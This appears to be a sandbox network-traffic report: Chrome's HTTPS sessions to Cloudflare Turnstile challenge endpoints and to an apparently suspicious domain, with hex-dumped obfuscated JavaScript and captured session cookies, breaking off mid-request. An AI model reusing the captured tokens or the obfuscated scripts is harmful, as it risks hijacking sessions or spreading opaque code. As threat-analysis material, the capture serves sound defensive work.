                                                            2025-01-07 19:24:58 UTC1369INData Raw: 5b 69 62 28 31 31 35 39 29 5d 3d 65 4d 5b 69 62 28 39 33 38 29 5d 5b 69 62 28 31 31 35 39 29 5d 2c 73 5b 69 62 28 39 31 31 29 5d 3d 65 4d 5b 69 62 28 39 33 38 29 5d 5b 69 62 28 38 37 38 29 5d 2c 78 3d 73 2c 42 3d 6e 65 77 20 65 4d 5b 28 69 62 28 31 32 32 35 29 29 5d 28 29 2c 21 42 29 72 65 74 75 72 6e 3b 43 3d 69 62 28 31 32 39 31 29 2c 42 5b 69 62 28 32 31 37 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 69 62 28 31 31 32 34 29 5d 3d 35 65 33 2c 42 5b 69 62 28 32 38 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 42 5b 69 62 28 31 33 37 36 29 5d 28 6b 5b 69 62 28 31 34 35 33 29 5d 2c 69 62 28 31 32 32 31 29 29 2c 44 3d 7b 7d 2c 44 5b 69 62 28 31 32 36 34 29 5d 3d 67 2c 44 5b 69 62 28 36 38 32 29 5d 3d 6c 2c 44 2e 63 63 3d 68 2c 44 5b 69 62 28 31 35 32
                                                            Data Ascii: [ib(1159)]=eM[ib(938)][ib(1159)],s[ib(911)]=eM[ib(938)][ib(878)],x=s,B=new eM[(ib(1225))](),!B)return;C=ib(1291),B[ib(217)](C,o,!![]),B[ib(1124)]=5e3,B[ib(281)]=function(){},B[ib(1376)](k[ib(1453)],ib(1221)),D={},D[ib(1264)]=g,D[ib(682)]=l,D.cc=h,D[ib(152
                                                            2025-01-07 19:24:58 UTC1369INData Raw: 67 29 7b 69 67 3d 69 65 2c 65 4d 5b 69 67 28 34 36 34 29 5d 28 29 7d 2c 31 65 33 29 3a 6b 5b 69 65 28 37 30 36 29 5d 28 69 65 28 31 35 31 39 29 2c 69 65 28 31 35 36 31 29 29 3f 28 6e 3d 7b 7d 2c 6e 5b 69 65 28 31 33 39 39 29 5d 3d 65 2c 6e 5b 69 65 28 37 34 35 29 5d 3d 66 2c 6e 5b 69 65 28 38 31 35 29 5d 3d 67 2c 6e 5b 69 65 28 31 34 30 32 29 5d 3d 68 2c 6e 5b 69 65 28 39 34 34 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 69 65 28 35 38 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 68 29 7b 69 68 3d 69 65 2c 65 4d 5b 69 68 28 31 30 32 38 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 6b 5b 69 68 28 31 32 34 39 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 69 65 28 35 38 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 69 29 7b 69 69 3d 69 65 2c 65 4d 5b 69 69 28 34 36 34 29 5d 28 29 7d
                                                            Data Ascii: g){ig=ie,eM[ig(464)]()},1e3):k[ie(706)](ie(1519),ie(1561))?(n={},n[ie(1399)]=e,n[ie(745)]=f,n[ie(815)]=g,n[ie(1402)]=h,n[ie(944)]=i,o=n,eM[ie(585)](function(ih){ih=ie,eM[ih(1028)](o,undefined,k[ih(1249)])},10),eM[ie(585)](function(ii){ii=ie,eM[ii(464)]()}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.849729104.18.95.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:58 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:58 UTC240INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:58 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654c2a9d20f70-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:58 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.849719188.114.96.34435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:59 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                            Host: brh5.bughtswo.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://brh5.bughtswo.com/tgs0/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: XSRF-TOKEN=eyJpdiI6ImJlOERWakNzdlM0dlYwUVBFRXpUbUE9PSIsInZhbHVlIjoiL21kUEYrN3ptblJyN0RJWGs2byt3Y3F4ZmxaNXhoeTk3UlVZeERKODUzWEZGMW1DN1RQMVhmRjlyS2VzdnpIdjJVTzhwRDlTZnR4SlFmWVFwU25JSGFVYzhaWHBnSVhBWVdnU2RjM2gvM0hrYVFXbFZNZm53TWR5NVJNalRpSC8iLCJtYWMiOiIwMGVmYjdkMTM4NTY1MjkyYjRjODUyOTY4ZDFlZDAyNjE1MDE5NDEwZjA2YzQ4MmQ3YzM4YWNhODFhMmVkMDBlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjQxdDdBeXl5aFhvUlhEUWJhMW5TL2c9PSIsInZhbHVlIjoiNVpkOW5NeGRDNlZuUHlXeXIwUk9ONys1WFIvK0drZVZkNnk3WUF2MitzUFNXb01jTEFrZzRza3pXRFBRMVZOSld0dkxiSTZTYlplY25RYklPTkxiUVZSOGxFblFUNmloRnpQSVhQMmZTZHA2OFROVUk4UUJWOWY2ajE0QzBFb2UiLCJtYWMiOiJmY2JlNzdiZGQ3NTBmOGU4Y2VjMzQ1YTY2N2I2MTNlNjhiYjkwNjAxYzIwNDljNzQ1MTA4MTY4NjEyMjI2YWU2IiwidGFnIjoiIn0%3D
                                                            2025-01-07 19:24:59 UTC1071INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Jan 2025 19:24:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=14400
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIKQxfDh6dFZESxWI%2F6Om6jn6s%2BNOixtlheTS%2BHZbxRpBq3NEh1byGQKpNQBnR7RhZpfFSSVyOYZvh0QaOCq4AiUwwpZLgfxHKNmMRvfDWz4RzdLRmxzwj2M1kvS0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Vary: Accept-Encoding
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=74514&min_rtt=74491&rtt_var=27951&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2271&delivery_rate=38232&cwnd=150&unsent_bytes=0&cid=c483a68a43ccff9c&ts=386&x=0"
                                                            CF-Cache-Status: HIT
                                                            Age: 14131
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654c55b69423a-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1701&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1896&delivery_rate=1629464&cwnd=170&unsent_bytes=0&cid=c6b32576ad7709c2&ts=4488&x=0"
                                                            2025-01-07 19:24:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.849731104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:59 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:59 UTC240INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:59 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654c6bd0d189d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.849732104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:59 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe654bc286c7d0b&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:59 UTC331INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:59 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 114161
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654c8f86d330c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:59 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 75 6d 61 6e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32
                                                            Data Ascii: uman","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_footer_privacy":"Privacy","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%2
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 67 33 2c 67 37 2c 67 38 2c 67 39 2c 67 64 2c 67 65 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 33 37 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 39 32 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 39 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 33 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 36 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 36 34 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 38 32 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32
                                                            Data Ascii: g3,g7,g8,g9,gd,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(937))/1+parseInt(gI(1492))/2*(parseInt(gI(1329))/3)+-parseInt(gI(1373))/4+parseInt(gI(666))/5+-parseInt(gI(464))/6+parseInt(gI(1782))/7+parseInt(gI(132
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 29 7b 69 66 28 65 5b 68 31 28 31 30 39 35 29 5d 28 65 5b 68 31 28 37 35 35 29 5d 2c 68 31 28 31 32 32 37 29 29 29 69 3d 7b 7d 2c 69 5b 68 31 28 31 36 35 39 29 5d 3d 65 5b 68 31 28 31 33 36 31 29 5d 2c 6a 3d 69 2c 68 3d 69 7c 7c 68 31 28 31 30 37 35 29 2c 6a 28 6b 2c 66 75 6e 63 74 69 6f 6e 28 6f 2c 68 32 29 7b 68 32 3d 68 31 2c 6f 5b 68 32 28 31 33 37 37 29 5d 5b 68 32 28 39 30 39 29 5d 3d 6d 2c 6f 5b 68 32 28 31 33 37 37 29 5d 5b 68 32 28 31 30 31 34 29 5d 3d 6a 5b 68 32 28 31 36 35 39 29 5d 7d 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 65 5b 68 31 28 31 30 38 31 29 5d 28 65 50 2c 65 51 28 63 29 29 7d 7d 2c 65 53 3d 66 75 6e 63 74 69 6f 6e 28 68 33 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 68 33 3d 67 4a 2c 64 3d 7b 27 78 4d 4a 4c 41 27 3a 66 75
                                                            Data Ascii: ){if(e[h1(1095)](e[h1(755)],h1(1227)))i={},i[h1(1659)]=e[h1(1361)],j=i,h=i||h1(1075),j(k,function(o,h2){h2=h1,o[h2(1377)][h2(909)]=m,o[h2(1377)][h2(1014)]=j[h2(1659)]});else return e[h1(1081)](eP,eQ(c))}},eS=function(h3,d,e,f,g){return h3=gJ,d={'xMJLA':fu
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 74 69 6f 6e 28 69 2c 68 35 29 7b 72 65 74 75 72 6e 20 68 35 3d 68 34 2c 68 35 28 37 32 31 29 5b 68 35 28 31 33 30 36 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 68 37 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 52 2c 4c 2c 4d 2c 4e 29 7b 69 66 28 68 37 3d 68 33 2c 73 3d 7b 27 74 4f 6c 47 44 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 68 36 29 7b 72 65 74 75 72 6e 20 68 36 3d 62 2c 64 5b 68 36 28 31 31 31 37 29 5d 28 4f 2c 50 29 7d 2c 27 71 76 65 54 54 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 29 7b 72 65 74 75 72 6e 20 4f 28 29 7d 2c 27 42 75 65 4d 56 27 3a 64 5b 68 37 28 39 37 38 29 5d 7d 2c 6e 75 6c 6c 3d 3d 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d
                                                            Data Ascii: tion(i,h5){return h5=h4,h5(721)[h5(1306)](i)})},'g':function(i,j,o,h7,s,x,B,C,D,E,F,G,H,I,J,K,R,L,M,N){if(h7=h3,s={'tOlGD':function(O,P,h6){return h6=b,d[h6(1117)](O,P)},'qveTT':function(O){return O()},'BueMV':d[h7(978)]},null==i)return'';for(B={},C={},D=
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 45 2c 66 75 6e 63 74 69 6f 6e 28 68 38 2c 52 2c 53 29 7b 68 38 3d 68 37 2c 52 3d 46 5b 68 38 28 37 36 32 29 5d 5b 68 38 28 31 36 31 39 29 5d 7c 7c 31 65 34 2c 53 3d 47 28 29 2c 21 48 5b 68 38 28 31 36 39 39 29 5d 26 26 21 49 28 29 26 26 21 4a 5b 68 38 28 39 39 36 29 5d 5b 68 38 28 38 38 39 29 5d 26 26 73 5b 68 38 28 39 34 35 29 5d 28 53 2c 4b 29 3e 52 3f 73 5b 68 38 28 31 30 39 34 29 5d 28 4e 29 3a 4f 28 29 7d 2c 31 65 33 29 3b 69 66 28 44 21 3d 3d 27 27 29 7b 69 66 28 64 5b 68 37 28 31 35 38 31 29 5d 3d 3d 3d 68 37 28 31 32 35 33 29 29 52 3d 7b 7d 2c 52 5b 68 37 28 31 31 34 33 29 5d 3d 73 5b 68 37 28 31 30 32 38 29 5d 2c 52 5b 68 37 28 31 37 32 37 29 5d 3d 48 5b 68 37 28 37 36 32 29 5d 5b 68 37 28 31 37 33 37 29 5d 2c 52 5b 68 37 28 31 37 30 30 29 5d 3d
                                                            Data Ascii: E,function(h8,R,S){h8=h7,R=F[h8(762)][h8(1619)]||1e4,S=G(),!H[h8(1699)]&&!I()&&!J[h8(996)][h8(889)]&&s[h8(945)](S,K)>R?s[h8(1094)](N):O()},1e3);if(D!==''){if(d[h7(1581)]===h7(1253))R={},R[h7(1143)]=s[h7(1028)],R[h7(1727)]=H[h7(762)][h7(1737)],R[h7(1700)]=
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 68 62 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 68 62 3d 68 33 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 62 28 31 34 36 34 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 4b 21 3d 46 3b 29 66 6f 72 28 4c 3d 64 5b 68 62 28 39 34 39 29 5d 5b 68 62 28 34 37 30 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4a 7c 3d 28 30 3c
                                                            Data Ascii: ':function(i,j,o,hb,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(hb=h3,s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;3>E;s[E]=E,E+=1);for(J=0,K=Math[hb(1464)](2,2),F=1;K!=F;)for(L=d[hb(949)][hb(470)]('|'),M=0;!![];){switch(L[M++]){case'0':F<<=1;continue;case'1':J|=(0<
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 68 62 28 31 34 36 34 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 33 28 31 35 35 36 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 37 34 30 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 35 33 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 75 29 7b 69 66 28 68 75 3d 67 4a 2c 65 4d 5b 68 75 28 37 34 30 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 75 28 37 34 30 29 5d 3d 21 21 5b 5d 7d 2c 65 5a 3d 30 2c 65 4e 5b 67 4a 28 31 36 36 36 29 5d 3d 3d 3d 67 4a 28 37 32 36 29 3f 65 4e 5b 67 4a 28 31 30 32 37 29 5d 28 67 4a 28 31 37 30 37 29 2c 66 75 6e 63 74 69 6f 6e 28 68 45 2c 63 29 7b 68 45 3d 67 4a 2c 63 3d 7b 27 48 51 50 4a 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 66 29 7d 7d 2c 63 5b 68 45 28
                                                            Data Ascii: hb(1464)](2,C),C++)}}},g={},g[h3(1556)]=f.h,g}(),eM[gJ(740)]=![],eM[gJ(538)]=function(hu){if(hu=gJ,eM[hu(740)])return;eM[hu(740)]=!![]},eZ=0,eN[gJ(1666)]===gJ(726)?eN[gJ(1027)](gJ(1707),function(hE,c){hE=gJ,c={'HQPJL':function(d,e,f){return d(e,f)}},c[hE(
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 69 66 28 21 6f 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 6f 3d 6e 65 77 20 65 4d 5b 28 68 48 28 31 34 38 32 29 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 73 3d 65 53 5b 68 48 28 31 35 35 36 29 5d 28 45 29 5b 68 48 28 31 37 35 35 29 5d 28 27 2b 27 2c 68 48 28 31 37 33 31 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 42 3d 28 78 3d 7b 7d 2c 78 5b 68 48 28 34 31 35 29 5d 3d 65 4d 5b 68 48 28 37 36 32 29 5d 5b 68 48 28 34 31 35 29 5d 2c 78 5b 68 48 28 31 38 33 32 29 5d 3d 65 4d 5b 68 48 28 37 36 32 29 5d 5b 68 48 28 31 38 33 32 29 5d 2c 78 5b 68 48 28 35 37 37 29 5d 3d 65 4d 5b 68 48 28 37 36 32 29 5d 5b 68 48 28 35 37 37 29 5d 2c 78 5b 68 48 28 38 34
                                                            Data Ascii: inue;case'6':if(!o)return;continue;case'7':o=new eM[(hH(1482))]();continue;case'8':s=eS[hH(1556)](E)[hH(1755)]('+',hH(1731));continue;case'9':B=(x={},x[hH(415)]=eM[hH(762)][hH(415)],x[hH(1832)]=eM[hH(762)][hH(1832)],x[hH(577)]=eM[hH(762)][hH(577)],x[hH(84
                                                            2025-01-07 19:24:59 UTC1369INData Raw: 5d 28 70 61 72 73 65 49 6e 74 2c 6c 5b 33 5d 2c 31 30 29 29 3b 65 6c 73 65 20 66 6f 72 28 6f 3d 65 5b 68 49 28 31 36 38 36 29 5d 5b 68 49 28 34 37 30 29 5d 28 27 7c 27 29 2c 73 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6f 5b 73 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 65 5b 68 49 28 36 30 38 29 5d 28 30 2c 78 29 26 26 28 42 3d 43 2c 44 3d 45 28 46 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 47 7c 3d 28 30 3c 76 3f 31 3a 30 29 2a 48 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 76 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 49 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 76 3d 65 5b 68 49 28 35 39 39 29 5d 28 6f 2c 73 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 7d 65
                                                            Data Ascii: ](parseInt,l[3],10));else for(o=e[hI(1686)][hI(470)]('|'),s=0;!![];){switch(o[s++]){case'0':e[hI(608)](0,x)&&(B=C,D=E(F++));continue;case'1':G|=(0<v?1:0)*H;continue;case'2':v>>=1;continue;case'3':I<<=1;continue;case'4':v=e[hI(599)](o,s);continue}break}}}e


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.849733104.18.95.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:59 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 3192
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: _dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B.
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
